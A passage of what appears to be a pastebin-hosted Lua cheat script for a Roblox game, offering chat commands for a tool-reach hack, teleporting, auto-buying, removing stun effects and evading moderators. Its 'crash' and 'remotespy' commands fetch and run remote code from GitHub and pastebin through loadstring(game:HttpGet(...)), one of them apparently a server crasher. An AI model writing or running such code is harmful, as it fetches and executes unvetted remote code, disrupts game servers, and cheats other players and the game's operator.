  3391. Humanoid.Running:Connect(function()
  3392. Lean:Stop()
  3393. Lay:Stop()
  3394. Dance1:Stop()
  3395. Dance2:Stop()
  3396. Greet:Stop()
  3397. Pray:Stop()
  3398. ChestPump:Stop()
  3399. end)
  3400. end
  3401.  
  3402. if CMD == 'korblox' then
  3403. game:GetService("Workspace").Players:FindFirstChild(player.Name).RightLowerLeg:Destroy()
  3404. game:GetService("Workspace").Players:FindFirstChild(player.Name).RightUpperLeg:Destroy()
  3405. game:GetService("Workspace").Players:FindFirstChild(player.Name).RightFoot:Destroy()
  3406. end
  3407.  
  3408. if CMD == 'crash' then
  3409. loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()
  3410. end
  3411.  
  3412. if CMD == 'lettuce' then
  3413. local Humanoid = player.Character:FindFirstChildWhichIsA('Humanoid')
  3414.  
  3415. local LettuceTool = Instance.new('Tool', player.Backpack)
  3416. LettuceTool.RequiresHandle = false
  3417. LettuceTool.CanBeDropped = true
  3418. LettuceTool.Name = 'Lettuce'
  3419. LettuceTool.ToolTip = 'inf lettuce eater yummy'
  3420.  
  3421. local function eat()
  3422. local Food = player.Backpack:FindFirstChild('[Lettuce]')
  3423. if Food and player.Character.BodyEffects.Attacking.Value == false then
  3424. Humanoid:EquipTool(Food)
  3425. player.Character:FindFirstChildWhichIsA('Tool'):Activate()
  3426. repeat wait() until player.Character.BodyEffects.Attacking.Value == false
  3427. Humanoid:EquipTool(LettuceTool)
  3428.  
  3429. end
  3430. end
  3431.  
  3432. LettuceTool.Activated:Connect(function()
  3433. eat()
  3434. end)
  3435. LettuceTool.Equipped:Connect(function()
  3436. while player.Character:FindFirstChild('Lettuce') do
  3437. wait()
  3438. local pathto = game:GetService("Workspace").Ignored.Shop["[Lettuce] - $5"].Head
  3439. local HRP = player.Character:FindFirstChild('HumanoidRootPart')
  3440. if HRP and player.Character:FindFirstChild('Lettuce') then
  3441. local Away = (HRP.Position - pathto.Position).Magnitude
  3442. if Away <= 30 then
  3443. for i,v in pairs(player.Backpack:GetChildren()) do
  3444. local Humanoid = player.Character:FindFirstChildWhichIsA('Humanoid')
  3445. if v.Name == '[Lettuce]' then
  3446. v.Parent = player.Character
  3447. end
  3448. end
  3449. fireclickdetector(pathto.Parent:FindFirstChild('ClickDetector'))
  3450. end
  3451. end
  3452. end
  3453. end)
  3454. end
  3455.  
  3456. if CMD == 'fov' then
  3457. if game.Workspace:FindFirstChildWhichIsA('Camera') then
  3458. game.Workspace:FindFirstChildWhichIsA('Camera').FieldOfView = tonumber(arguments[2])
  3459. end
  3460. end
  3461.  
  3462. BRIGHT = false
  3463. if CMD == 'bright' or CMD == 'unbright' then
  3464. if BRIGHT == false then
  3465. BRIGHT = true
  3466. game:GetService("Lighting").GlobalShadows = false
  3467. else
  3468. BRIGHT = false
  3469. game:GetService("Lighting").GlobalShadows = true
  3470. end
  3471. end
  3472.  
  3473. if CMD == 'tool' or CMD == 'tools' then
  3474. for i,v in pairs(game:GetService("Workspace").Ignored.ItemsDrop:GetChildren()) do
  3475. player.Character.HumanoidRootPart.CFrame = v.CFrame
  3476. wait(0.01)
  3477. end
  3478. end
  3479.  
  3480. if CMD == 'zoom' or CMD == 'infzoom' then
  3481. player.CameraMaxZoomDistance = math.huge
  3482. end
  3483.  
  3484. FOG = false
  3485. if CMD == 'fog' then
  3486. if FOG == false then
  3487. FOG = true
  3488. game:GetService("Lighting").FogEnd = 5000
  3489. else
  3490. FOG = false
  3491. game:GetService("Lighting").FogEnd = 500
  3492. end
  3493. end
  3494.  
  3495. if CMD == 'set' then
  3496. local plrtotarget = arguments[2]
  3497. if plrtotarget then
  3498. local playr = findPlayer(plrtotarget)
  3499. if playr then
  3500. TargetTextbox.Text = playr.Name
  3501. SetPlayerInfo()
  3502. end
  3503. end
  3504. end
  3505.  
  3506. if CMD == 'float' then
  3507. if player.Character:FindFirstChildWhichIsA('Tool') then
  3508. if player.Character:FindFirstChildWhichIsA('Tool'):FindFirstChild('Handle'):FindFirstChildWhichIsA('BillboardGui') then
  3509. player.Character:FindFirstChildWhichIsA('Tool'):FindFirstChild('Handle'):FindFirstChildWhichIsA('BillboardGui'):Destroy()
  3510. end
  3511. end
  3512. end
  3513.  
  3514. if CMD == 'to' then
  3515. local playerToTeleportToName = arguments[2]
  3516. if playerToTeleportToName then
  3517. local plrToTPTo = findPlayer(playerToTeleportToName)
  3518. if plrToTPTo then
  3519. game:GetService('Workspace').Players:WaitForChild(player.Name).HumanoidRootPart.CFrame = game:GetService('Workspace').Players:WaitForChild(plrToTPTo.Name).HumanoidRootPart.CFrame
  3520. if not player.Character.LeftHand:FindFirstChild('LeftWrist') then
  3521. player.Character.LeftHand.CFrame = player.Character.HumanoidRootPart.CFrame
  3522. player.Character.RightHand.CFrame = player.Character.HumanoidRootPart.CFrame
  3523. end
  3524. end
  3525. end
  3526. end
  3527.  
  3528. if CMD == 'sit' then
  3529. game.Players.LocalPlayer.Character.Humanoid.Sit = true
  3530. end
  3531.  
  3532. if CMD == 'recoil' then
  3533. for i,v in pairs(game:GetService('Workspace'):GetChildren()) do
  3534. if v:IsA('Camera') then
  3535. v:Destroy()
  3536. end
  3537. end
  3538.  
  3539. local newcam = Instance.new('Camera')
  3540. newcam.Parent = game:GetService('Workspace')
  3541. newcam.Name = 'Camera'
  3542. newcam.CameraType = 'Custom'
  3543. newcam.CameraSubject = game:GetService('Workspace').Players:FindFirstChild(player.Name):FindFirstChild('Humanoid')
  3544. newcam.HeadLocked = true
  3545. newcam.HeadScale = 1
  3546.  
  3547. end
  3548.  
  3549. if CMD == 'headless' then
  3550. player.Character.Head:BreakJoints()
  3551. player.Character.Head.Position = Vector3.new(0,99999999999999,0)
  3552. end
  3553.  
  3554. if CMD == 'hideboombox' or CMD == 'boombox' then
  3555. player.Character.BOOMBOXHANDLE:Destroy()
  3556. end
  3557.  
  3558. if CMD == 'reach' or CMD == 'toolreach' then
  3559. if player.Character:FindFirstChildWhichIsA('Tool') then
  3560. player.Character:FindFirstChildWhichIsA('Tool').Handle.Size = Vector3.new(50,50,50)
  3561. player.Character:FindFirstChildWhichIsA('Tool').Handle.Transparency = 1
  3562. end
  3563. end
  3564. if CMD == 'taser' then
  3565. player.Character.HumanoidRootPart.CFrame = CFrame.new(-271.194, 21.8, -103.052)
  3566. local LettuceTool = Instance.new('Tool', player.Backpack)
  3567. LettuceTool.RequiresHandle = false
  3568. LettuceTool.CanBeDropped = true
  3569. LettuceTool.Name = 'Taser'
  3570. LettuceTool.ToolTip = 'tazer'
  3571.  
  3572. local function eat()
  3573. hold:Play()
  3574. for i,v in pairs(player.Backpack:GetChildren()) do
  3575. if v.Name == '[Taser]' then
  3576. v.Parent = player.Character
  3577. end
  3578. end
  3579. for i,v in pairs(player.Character:GetChildren()) do
  3580. if v.Name == '[Taser]' then
  3581. v:Activate()
  3582. end
  3583. end
  3584. end
  3585.  
  3586. LettuceTool.Activated:Connect(function()
  3587. eat()
  3588. end)
  3589. LettuceTool.Unequipped:Connect(function()
  3590.  
  3591. end)
  3592. LettuceTool.Equipped:Connect(function()
  3593. while player.Character:FindFirstChild('Taser') do
  3594. local a = 0
  3595. for i,v in pairs(player.Character:GetChildren()) do
  3596. if v.Name == '[Taser]' then
  3597. a = a + 1
  3598. end
  3599. end
  3600. LettuceTool.ToolTip = tostring(a)
  3601. wait(3)
  3602. end
  3603. end)
  3604. coroutine.resume(coroutine.create(function()
  3605. local pathto = game:GetService("Workspace").Ignored.Shop["[Taser] - $1000"].Head
  3606. while wait(0.05) do
  3607. local sus = game:GetService("Players"):FindFirstChild(player.Name).PlayerGui.MainScreenGui:FindFirstChild('whiteScreen')
  3608. if sus then
  3609. sus:Destroy()
  3610. end
  3611. local HRP = player.Character:FindFirstChild('HumanoidRootPart')
  3612. if HRP and player.Character:FindFirstChild('Taser') then
  3613. local Away = (HRP.Position - pathto.Position).Magnitude
  3614. if Away <= 30 then
  3615. for i,v in pairs(player.Backpack:GetChildren()) do
  3616. local Humanoid = player.Character:FindFirstChildWhichIsA('Humanoid')
  3617. if v.Name == '[Taser]' then
  3618. v.Parent = player.Character
  3619. end
  3620. end
  3621. fireclickdetector(pathto.Parent:FindFirstChild('ClickDetector'))
  3622. end
  3623. end
  3624. end
  3625. end))
  3626. end
  3627.  
  3628. if CMD == 'view' then
  3629. local plrtoview = arguments[2]
  3630. if plrtoview then
  3631. local ptv = findPlayer(plrtoview)
  3632. if ptv then
  3633. local Camera = game.Workspace:FindFirstChildWhichIsA('Camera')
  3634. View.Text = "Unview"
  3635. repeat view(ptv.Name) until View.Text == 'View'
  3636. Camera.CameraSubject = player.Character:FindFirstChildWhichIsA('Humanoid')
  3637. end
  3638. end
  3639. end
  3640.  
  3641. if CMD == 'unview' then
  3642. local Camera = game.Workspace:FindFirstChildWhichIsA('Camera')
  3643. Camera.CameraSubject = player.Character:FindFirstChildWhichIsA('Humanoid')
  3644. View.Text = "View"
  3645. end
  3646.  
  3647. if CMD == 'shield' then
  3648. if IsMod == true then
  3649. DisableMod = true
  3650. notify('Immune to mod powers', '', 4)
  3651. end
  3652. end
  3653. if CMD == 'unshield' then
  3654. if IsMod == true then
  3655. DisableMod = false
  3656. notify('Unimmune to mod powers', '', 4)
  3657. end
  3658. end
  3659.  
  3660. if CMD == 're' then
  3661. player.Character:Destroy()
  3662. end
  3663.  
  3664. if CMD == 'ping' then
  3665. while wait() do
  3666. local Animations = game.Players.LocalPlayer:FindFirstChild('PlayerGui'):FindFirstChild('MainScreenGui'):FindFirstChild('AnimationPack')
  3667. if Animations then
  3668. Animations.TextScaled = true
  3669. Animations.Text = game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValueString()
  3670. end
  3671. end
  3672. end
  3673.  
  3674. if CMD == 'faceless' or CMD == 'noface' then
  3675. player.Character.Head.face:Destroy()
  3676. end
  3677.  
  3678. if CMD == 'hidemask' then
  3679. player.Character:FindFirstChild('In-gameMask').Handle:Destroy()
  3680. end
  3681. if CMD == 'names' then
  3682. local function checkdisplay()
  3683. for i,v in pairs(game:GetService('Workspace').Players:GetChildren()) do
  3684. if v.Name ~= game.Players:FindFirstChild(v.Name).DisplayName then
  3685. if v:FindFirstChild('UpperTorso'):FindFirstChild('OriginalSize') or v:FindFirstChild('LowerTorso'):FindFirstChild('OriginalSize') then
  3686. v:FindFirstChildWhichIsA('Humanoid').DisplayName = (game.Players:FindFirstChild(v.Name).DisplayName .. ' / ' .. v.Name)
  3687. end
  3688. end
  3689. end
  3690. end
  3691. checkdisplay()
  3692. end
  3693. if CMD == 'remotespy' then
  3694. loadstring(game:HttpGet("https://pastebin.com/raw/BDhSQqUU", true))()
  3695. end
  3696. if CMD == 'flashlight' then
  3697. local Humanoid = player.Character:FindFirstChildWhichIsA('Humanoid')
  3698. local mouse = player:GetMouse()
  3699. local hold = player.Character.Humanoid:LoadAnimation(game:GetService("ReplicatedStorage").ClientAnimations.SmallGunAim)
  3700.  
  3701. local LettuceTool = Instance.new('Tool', player.Backpack)
  3702. LettuceTool.RequiresHandle = false
  3703. LettuceTool.CanBeDropped = true
  3704. LettuceTool.Name = 'Flashlight'
  3705. LettuceTool.ToolTip = 'rpg'
  3706. local gun = '[Flashlight]'
  3707.  
  3708. local function eat()
  3709. hold:Play()
  3710. for i,v in pairs(player.Backpack:GetChildren()) do
  3711. if v.Name == gun then
  3712. v.Parent = player.Character
  3713. end
  3714. end
  3715. wait(0.2)
  3716. for i,v in pairs(player.Character:GetChildren()) do
  3717. if v.Name == gun then
  3718. v:Activate()
  3719. end
  3720. end
  3721. end
  3722. LettuceTool.Activated:Connect(function()
  3723. eat()
  3724. end)
  3725. LettuceTool.Unequipped:Connect(function()
  3726. hold:Stop()
  3727. end)
  3728. LettuceTool.Equipped:Connect(function()
  3729. hold:Play()
  3730. local ammo = 0
  3731. for i,v in pairs(player.Backpack:GetChildren()) do
  3732. if v.Name == gun then
  3733. ammo = ammo + v.Ammo.Value
  3734. end
  3735. end
  3736. LettuceTool.ToolTip = ammo
  3737. end)
  3738. coroutine.resume(coroutine.create(function()
  3739. local pathto = game:GetService("Workspace").Ignored.Shop["[Flashlight] - $10"].Head
  3740. while wait(0.05) do
  3741. local sus = game:GetService("Players"):FindFirstChild(player.Name).PlayerGui.MainScreenGui:FindFirstChild('whiteScreen')
  3742. if sus then
  3743. sus:Destroy()
  3744. end
  3745. local HRP = player.Character:FindFirstChild('HumanoidRootPart')
  3746. if HRP and player.Character:FindFirstChild('Flashlight') then
  3747. local Away = (HRP.Position - pathto.Position).Magnitude
  3748. if Away <= 30 then
  3749. for i,v in pairs(player.Backpack:GetChildren()) do
  3750. local Humanoid = player.Character:FindFirstChildWhichIsA('Humanoid')
  3751. if v.Name == '[Flashlight]' then
  3752. v.Parent = player.Character
  3753. end
  3754. end
  3755. fireclickdetector(pathto.Parent:FindFirstChild('ClickDetector'))
  3756. end
  3757. end
  3758. end
  3759. end))
  3760. end
  3761. if CMD == 'nuke' then
  3762. local LettuceTool = Instance.new('Tool', player.Backpack)
  3763. LettuceTool.RequiresHandle = false
  3764. LettuceTool.CanBeDropped = true
  3765. LettuceTool.Name = 'Nuke'
  3766. LettuceTool.ToolTip = 'tazer'
  3767.  
  3768. local function eat()
  3769. hold:Play()
  3770. for i,v in pairs(player.Backpack:GetChildren()) do
  3771. if v.Name == '[Grenade]' then
  3772. v.Parent = player.Character
  3773. end
  3774. end
  3775. for i,v in pairs(player.Character:GetChildren()) do
  3776. if v.Name == '[Grenade]' then
  3777. v:Activate()
  3778. v:Activate()
  3779. end
  3780. end
  3781.  
  3782. end
  3783.  
  3784. LettuceTool.Activated:Connect(function()
  3785. eat()
  3786. for i,v in pairs(game.Workspace.Ignored:GetChildren()) do
  3787. if v.Name == 'Handle' then
  3788. v.Position = mouse.Hit.p
  3789. end
  3790. end
  3791. end)
  3792. LettuceTool.Unequipped:Connect(function()
  3793. hold:Stop()
  3794. end)
  3795. LettuceTool.Equipped:Connect(function()
  3796. while player.Character:FindFirstChild('Nuke') do
  3797. local a = 0
  3798. for i,v in pairs(player.Character:GetChildren()) do
  3799. if v.Name == '[Grenade]' then
  3800. a = a + 1
  3801. end
  3802. end
  3803. LettuceTool.ToolTip = tostring(a)
  3804. wait(3)
  3805. end
  3806. end)
  3807. coroutine.resume(coroutine.create(function()
  3808. local pathto = game:GetService("Workspace").Ignored.Shop["[Grenade] - $700"].Head
  3809. while wait(0.05) do
  3810. local sus = game:GetService("Players"):FindFirstChild(player.Name).PlayerGui.MainScreenGui:FindFirstChild('whiteScreen')
  3811. if sus then
  3812. sus:Destroy()
  3813. end
  3814. local HRP = player.Character:FindFirstChild('HumanoidRootPart')
  3815. if HRP and player.Character:FindFirstChild('Nuke') then
  3816. local Away = (HRP.Position - pathto.Position).Magnitude
  3817. if Away <= 30 then
  3818. for i,v in pairs(player.Backpack:GetChildren()) do
  3819. local Humanoid = player.Character:FindFirstChildWhichIsA('Humanoid')
  3820. if v.Name == '[Grenade]' then
  3821. v.Parent = player.Character
  3822. end
  3823. end
  3824. fireclickdetector(pathto.Parent:FindFirstChild('ClickDetector'))
  3825. end
  3826. end
  3827. end
  3828. end))
  3829. end
  3830. if CMD == 'mute' then
  3831. if tostring(arguments[2]) == 'all' then
  3832. muteingnew = true
  3833. for _,v in pairs(Players:GetChildren()) do
  3834. if not table.find(muted, v.Name) then
  3835. table.insert(muted, v.Name)
  3836. print('muted ' .. v.Name)
  3837. end
  3838. end
  3839. else
  3840. local plrtoview = arguments[2]
  3841. if plrtoview then
  3842. local ptv = findPlayer(plrtoview)
  3843. if ptv then
  3844. if not table.find(muted, ptv.Name) then
  3845. table.insert(muted, ptv.Name)
  3846. print('manualy muted ' .. ptv.Name)
  3847. end
  3848. end
  3849. end
  3850. end
  3851. end
  3852.  
  3853. coroutine.resume(coroutine.create(function()
  3854. local function mute()
  3855. for i,v in pairs(Players:GetChildren()) do
  3856. if table.find(muted, v.Name) then
  3857. if v.Character then
  3858. if v.Character.LowerTorso:FindFirstChild('BOOMBOXSOUND') and v.Character.UpperTorso:FindFirstChild('OriginalSize') then
  3859. v.Character.LowerTorso:FindFirstChild('BOOMBOXSOUND'):Stop()
  3860. end
  3861. end
  3862. end
  3863. end
  3864. end
  3865. while wait(.2) do
  3866. local success,err = pcall(mute)
  3867. end
  3868. end))
  3869.  
  3870. if CMD == 'unmute' then
  3871. if tostring(arguments[2]) == 'all' then
  3872. muteingnew = false
  3873. for _,v in pairs(Players:GetChildren()) do
  3874. if table.find(muted, v.Name) then
  3875. local removemute = table.find(muted, v.Name)
  3876. table.remove(muted, removemute)
  3877. print('unmuteed ' .. v.Name)
  3878. end
  3879. end
  3880. else
  3881. local plrtoview = arguments[2]
  3882. if plrtoview then
  3883. local ptv = findPlayer(plrtoview)
  3884. if ptv then
  3885. if table.find(muted, ptv.Name) then
  3886. local removemute = table.find(muted, ptv.Name)
  3887. table.remove(muted, removemute)
  3888. print('unmuteed ' .. ptv.Name)
  3889. end
  3890. end
  3891. end
  3892. end
  3893. end
  3894.  
  3895. if CMD == 'buy' then
  3896. local itemtobuy = nil
  3897. local itemtobuyammofor = nil
  3898. local ammomodel = nil
  3899. local oldpos = player.Character.HumanoidRootPart.CFrame
  3900. local Cash = player.DataFolder.Currency.Value
  3901. for i,v in pairs(game:GetService('Workspace').Ignored.Shop:GetChildren()) do
  3902. if itemtobuy == nil then
  3903. if string.find(string.lower(v.Name), arguments[2]) and not string.find(v.Name, 'Ammo') and itemtobuy == nil then
  3904. if arguments[2] == 'shotgun' then
  3905. itemtobuy = game:GetService("Workspace").Ignored.Shop["[Shotgun] - $1250"]
  3906. elseif arguments[2] == 'tacshotgun' or arguments[2] == 'tacticalshotgun' then
  3907. itemtobuy = game:GetService("Workspace").Ignored.Shop["[TacticalShotgun] - $1750"]
  3908. elseif arguments[2] == 'key' then
  3909. itemtobuy = game:GetService("Workspace").Ignored.Shop["[Key] - $125"]
  3910. else
  3911. itemtobuy = v
  3912. end
  3913. end
  3914. if itemtobuy then
  3915. if string.find(itemtobuy.Name, 'Mask') then
  3916. itemtobuy = game:GetService("Workspace").Ignored.Shop["[Surgeon Mask] - $25"]
  3917. end
  3918. local pricesplit = string.split(itemtobuy.Name, '$')
  3919. local itemnamesplit = string.split(itemtobuy.Name, '-')
  3920. local price = tonumber(pricesplit[2])
  3921. local name = string.gsub(tostring(itemnamesplit[1]), " ", "")
  3922. print(name)
  3923. local function buygun()
  3924. wait()
  3925. Cash = player.DataFolder.Currency.Value
  3926. player.Character.HumanoidRootPart.CFrame = itemtobuy.Head.CFrame
  3927. fireclickdetector(itemtobuy.ClickDetector)
  3928. end
  3929. if name == '[MoneyGun]' then
  3930. repeat buygun() until player.Backpack:FindFirstChild('[Money Gun]') or Cash < price
  3931. elseif name == '[Double' then
  3932. repeat buygun() until player.Backpack:FindFirstChild('[Double-Barrel SG]') or Cash < price
  3933. elseif name == '[SurgeonMask]' then
  3934. repeat buygun() until player.Backpack:FindFirstChild('[Surgeon Mask]') or Cash < price
  3935. elseif name ~= '[MediumArmor]' then
  3936. repeat buygun() until player.Backpack:FindFirstChild(name) or Cash < price
  3937. else
  3938. repeat buygun() until player.Backpack:FindFirstChild(name) or Cash < price or player.Character.BodyEffects.Armor.Value == 100
  3939. end
  3940. player.Character.HumanoidRootPart.CFrame = oldpos
  3941. end
  3942. end
  3943. end
  3944. end
  3945. end
  3946. player.Chatted:Connect(function(message,recipient)
  3947. message = string.lower(message)
  3948. local splitString = message:split(" ") -- Will Split String when space
  3949. local slashCommand = splitString[1]
  3950. local cmd = slashCommand:split(prefix)
  3951. local cmdName = cmd[2]
  3952. if commands[cmdName] then
  3953. local arguments = {}
  3954. for i = 2, #splitString, 1 do
  3955. table.insert(arguments,splitString[i])
  3956. end
  3957. commands[cmdName](arguments)
  3958. end
  3959. end)
  3960.  
  3961.  
  3962. ------------------------------------------------------------------------------------------------------------------------------------------------
  3963. ------------------------------------------------------------------------------------------------------------------------------------------------
  3964. ------------------------------------------------------------------------------------------------------------------------------------------------
  3965. ------------------------------------------------------------------------------------------------------------------------------------------------
  3966. ------------------------------------------------------------------------------------------------------------------------------------------------
  3967.  
  3968. wait(5)
  3969. if ModCheck[player.UserId] then
  3970. IsMod = true
  3971. DisableMod = true
  3972. notify('Granted Mod Powers', 'you are immune to mod powers | type /e noshield or /e shield to toggle', 10)
  3973. elseif table.find(swagmins, player.UserId) then
  3974. notify('Granted Admin Powers', 'hi :3', 10)
  3975. IsMod = false
  3976. DisableMod = false
  3977. else
  3978. IsMod = false
  3979. DisableMod = false
  3980. notify('Commands Loaded', 'join discord.gg/swagmode for a list of commands', 10)
  3981. end
  3982.  
Add Comment
Please, Sign In to add comment